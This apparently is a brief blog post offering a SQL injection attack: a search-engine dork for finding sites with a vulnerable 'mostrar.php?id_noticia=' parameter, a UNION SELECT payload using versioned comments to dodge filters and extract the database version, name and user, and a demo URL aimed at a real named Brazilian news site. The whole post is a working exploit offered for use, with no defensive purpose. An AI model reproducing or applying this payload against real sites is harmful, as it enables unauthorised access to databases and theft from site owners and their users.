Dork:
inurl:"mostrar.php?id_noticia="
Exploit:
+and+0+/*!12345union*/+/*!12345select*/+1,version(),database(),4,user(),6,7,8,9,10--+
Demo:
http://www.cbnmogi.com.br/mostrar.php?id_noticia=2838+and+0+/*!12345union*/+/*!12345select*/+1,version(),database(),4,user(),6,7,8,9,10--+
Just use your brain!
No comments:
Post a Comment